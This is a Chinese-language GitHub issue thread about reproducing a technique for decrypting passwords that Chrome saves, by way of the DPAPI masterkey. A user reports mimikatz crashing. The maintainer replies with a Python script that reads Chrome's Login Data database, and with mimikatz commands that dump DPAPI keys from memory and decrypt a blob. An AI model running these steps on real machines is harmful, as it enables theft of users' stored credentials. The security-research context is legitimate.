### ISSUE TITLE
根据利用Masterkey离线导出Chrome浏览器中保存的密码出现问题

### ISSUE THREAD

**Issue by helloyw** [3gstudent/feedback#39]
请教一下根据利用Masterkey离线导出Chrome浏览器中保存的密码这篇文章，进行复现得过程中出现了错误，在最后一步通过mimikaz解密得时候dpapi::blob /in:test.txt，mimikaz出现了崩溃得现象
![7QJ9NT(~44JDB TF(J4(XWN](https://user-images.githubusercontent.com/32027872/80275871-d1604900-8716-11ea-88ae-58643281a5ef.png)

**Comment by 3gstudent** [comment]
看看是不是生成的test.txt有问题
可以尝试使用Windows Password Recovery解密test.txt的内容，如果无法解密，应该是test.txt的问题

**Comment by helloyw** [comment]
这是脚本内容

![BQ%FTO687HNP1ELJT3$ LPL](https://user-images.githubusercontent.com/32027872/80294701-cc92a800-879d-11ea-8376-59a65911bee2.png)

**Comment by 3gstudent** [comment]
```
from os import getenv
import sqlite3
import binascii
conn = sqlite3.connect(getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data")
cursor = conn.cursor()
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
for result in cursor.fetchall():
    print (binascii.b2a_hex(result[2]))
```

看看能不能获得加密内容

**Comment by helloyw** [comment]
可以获取到输出：7631302379f22cdbbd4dbc4dd35fde4b5f5f44d5def93e9a4f4d3b11c7f5436940544f65d748b5de94098e23

**Comment by 3gstudent** [comment]
privilege::debug
sekurlsa::dpapi
dpapi::blob /in test.txt

看看在线方式能不能正常解密

**Comment by helloyw** [comment]
dpapi::blob /in test.txt不加冒号啥也不输出，加了直接mimikaz崩溃
![6~K4R}HCWHW9L`4N8{6C %V](https://user-images.githubusercontent.com/32027872/80296228-aecc3f80-87ab-11ea-9d5c-11c6703bc3a7.png)

**Comment by 3gstudent** [comment]
是`dpapi::blob /in:test.txt`

你可以改一下源码加一些调试信息：https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/dpapi/kuhl_m_dpapi.c#L33

看看是哪一步报错了

**Comment by helloyw** [comment]
好的感谢！
